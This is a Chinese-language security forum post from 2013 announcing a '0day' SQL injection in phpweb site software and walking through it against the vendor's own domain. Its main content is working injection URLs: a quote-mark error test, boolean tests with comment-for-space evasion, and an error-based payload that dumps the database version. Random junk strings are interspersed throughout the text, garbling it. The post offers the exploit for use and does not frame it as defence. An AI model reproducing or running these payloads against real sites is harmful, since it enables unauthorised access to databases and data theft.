找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2270|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
8 t& e9 S( F  x4 }& A! A) R+ d
5 ]8 l2 u# L+ o3 C- d6 a/ G主站:http://phpweb.net/
4 w4 X) B6 f+ ?( J) A, l" [+ T加’检测:
9 U, h! l; \8 C) [$ v6 b( E
# ?' m; O1 d5 R7 bhttp://www.phpweb.net/down/html/?772′.html6 t3 _: v+ v  H2 P' b/ ^

* j5 B' F: z+ [; a8 E出错5 D+ v% L, T. z: }# _. z9 r$ x+ K
存在注入。
5 ]( v+ T8 Y" d% g2 B+ q6 k; K不能用空格,只能用/*罗
$ h: h0 [8 M+ V9 X+ p( Z; Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常9 ?, e) w7 h- W. y
& g4 g) v* ~+ g0 U' s5 z0 o
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! i: C1 q& S0 z" c: n) d% c' a4 K
爆数据库版本:" {' d: s* [* ^4 s) M% h

& J$ T9 J# y) [9 H1 z6 u- i) E/ f3 c?0 g! a) C( N) Q. [# w
1
  K- ]+ W6 C4 U& Whttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
% ?# ~5 a) `. ?% g4 `& Z更新日期: 2013-01-03 13:39:50        
: q1 |1 g( p: T4 r8 W5 a0 g3 p  h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表